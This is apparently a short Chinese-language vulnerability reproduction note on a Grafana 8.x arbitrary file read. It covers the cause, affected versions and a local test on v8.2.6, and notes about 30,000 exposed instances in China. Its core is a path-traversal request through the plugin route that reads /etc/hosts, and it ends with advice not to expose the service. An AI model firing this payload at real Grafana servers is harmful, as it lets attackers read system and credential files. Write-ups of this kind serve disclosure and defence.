1. 漏洞概述
Grafana 是一個跨平台、開源的資料可視化網絡應用程式平台。使用者配置連接配接的資料源之後,Grafana可以在網絡浏覽器裡顯示資料圖表和警告。需要注意的是該漏洞并不依賴于某個特定的插件,而是因為 Grafana在解析插件路由的時候沒有對輸入進行有效過濾造成的任意檔案讀取。
2. 漏洞影響
| Grafana | 是否受影響 |
|---|---|
| 8.x | 是 |
3. 漏洞複現
本地搭建Grafana v8.2.6環境(搭建流程此處不再闡述),搭建後通路如下:
通路http://127.0.0.1:3001/login抓包,更改原始請求
> exp:/public/plugins/welcome/../../../../../../../../../etc/hosts
成功讀取hosts檔案,如下
3. 影響統計
fofa搜尋國内使用Grafana總數,近3w+
4、整改建議
**非必要禁止對外開放該服務。**